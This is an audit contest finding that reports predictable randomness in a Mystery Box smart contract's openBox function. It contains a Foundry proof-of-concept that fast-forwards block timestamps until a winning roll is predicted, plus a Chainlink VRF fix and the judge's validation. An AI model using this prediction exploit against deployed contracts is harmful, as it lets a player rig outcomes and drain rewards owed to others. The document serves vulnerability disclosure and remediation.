Mystery Box

First Flight #25
Beginner Friendly, Foundry
100 EXP
Submission Details
Severity: medium
Valid

User can predict the rarity and reward of box

Summary

Randomness is predictable in the openBox function.

Vulnerability Details

The random value in openBox is derived using the following logic:

// Generate a random number between 0 and 99
uint256 randomValue = uint256(keccak256(abi.encodePacked(block.timestamp, msg.sender))) % 100;

Both block.timestamp and msg.sender are predictable, so a caller can compute randomValue before calling openBox.

POC:

    function test_randomness() public {
        vm.deal(user1, 0.1 ether);
        uint winnings = 0;
        uint time = 1;
        vm.prank(user1);
        mysteryBox.buyBox{value: 0.1 ether}();
        console.log(address(user1).balance);
        while (winnings == 0) {
            vm.warp(++time);
            // Predict with user1: inside openBox, msg.sender is the pranked address, not the test's own caller
            if ((uint256(keccak256(abi.encodePacked(block.timestamp, user1))) % 100) == 99) { // Making sure I always win
                vm.prank(user1);
                mysteryBox.openBox();
                // this block is executed only if the user is going to win the challenge
                winnings = 1;
                break;
            }
        }
        vm.assertEq(winnings, 1);
    }

Impact

A user can predict their chances of winning the lottery every single time, and in some cases can even win it outright.

Tools Used

Foundry 0.2.0

Recommendations

Consider using a decentralized oracle for the generation of random numbers, such as Chainlink VRF.
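
One way to apply this recommendation, as an added sketch that is not the contest's code: openBox is split into a request and a callback using the Chainlink VRF v2 consumer API, so the box is spent before the random word exists. The contract name, the state variables (boxesOwned, pendingOpener, lastRoll), the events and the numeric request parameters are assumptions; the 0.1 ether price is taken from the PoC's buyBox call.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Import paths depend on the installed @chainlink/contracts version (VRF v2 shown).
import {VRFConsumerBaseV2} from "@chainlink/contracts/src/v0.8/vrf/VRFConsumerBaseV2.sol";
import {VRFCoordinatorV2Interface} from "@chainlink/contracts/src/v0.8/vrf/interfaces/VRFCoordinatorV2Interface.sol";

// Hypothetical contract: names below are illustrative, not from the audited code.
contract MysteryBoxVrfSketch is VRFConsumerBaseV2 {
    VRFCoordinatorV2Interface private immutable coordinator;
    bytes32 private immutable keyHash; // gas lane, network-specific
    uint64 private immutable subId;    // funded VRF subscription

    mapping(address => uint256) public boxesOwned;
    mapping(uint256 => address) private pendingOpener; // requestId => box owner
    mapping(address => uint256) public lastRoll;       // 0..99, written by the callback

    event BoxOpenRequested(address indexed user, uint256 requestId);
    event BoxOpened(address indexed user, uint256 roll);

    constructor(address _coordinator, bytes32 _keyHash, uint64 _subId) VRFConsumerBaseV2(_coordinator) {
        coordinator = VRFCoordinatorV2Interface(_coordinator);
        keyHash = _keyHash;
        subId = _subId;
    }

    function buyBox() external payable {
        require(msg.value == 0.1 ether, "Incorrect ETH sent");
        boxesOwned[msg.sender] += 1;
    }

    // Step 1 (commit): the box is consumed before any randomness exists, so the
    // caller cannot wait for a favourable timestamp or back out of a bad roll.
    function openBox() external returns (uint256 requestId) {
        require(boxesOwned[msg.sender] > 0, "No boxes to open");
        boxesOwned[msg.sender] -= 1;
        // 3 confirmations, 100k callback gas, 1 random word (assumed values)
        requestId = coordinator.requestRandomWords(keyHash, subId, 3, 100_000, 1);
        pendingOpener[requestId] = msg.sender;
        emit BoxOpenRequested(msg.sender, requestId);
    }

    // Step 2 (reveal): reached only through the coordinator, with a verified random word.
    function fulfillRandomWords(uint256 requestId, uint256[] memory randomWords) internal override {
        address user = pendingOpener[requestId];
        delete pendingOpener[requestId];
        uint256 roll = randomWords[0] % 100; // same 0..99 range as the original logic
        lastRoll[user] = roll;               // reward tiers would be assigned from roll here
        emit BoxOpened(user, roll);
    }
}
```

The callback is kept small and free of reverting checks because a failed fulfillment is not retried by the coordinator.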

Updates

Appeal created

inallhonesty Lead Judge 9 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Weak Randomness
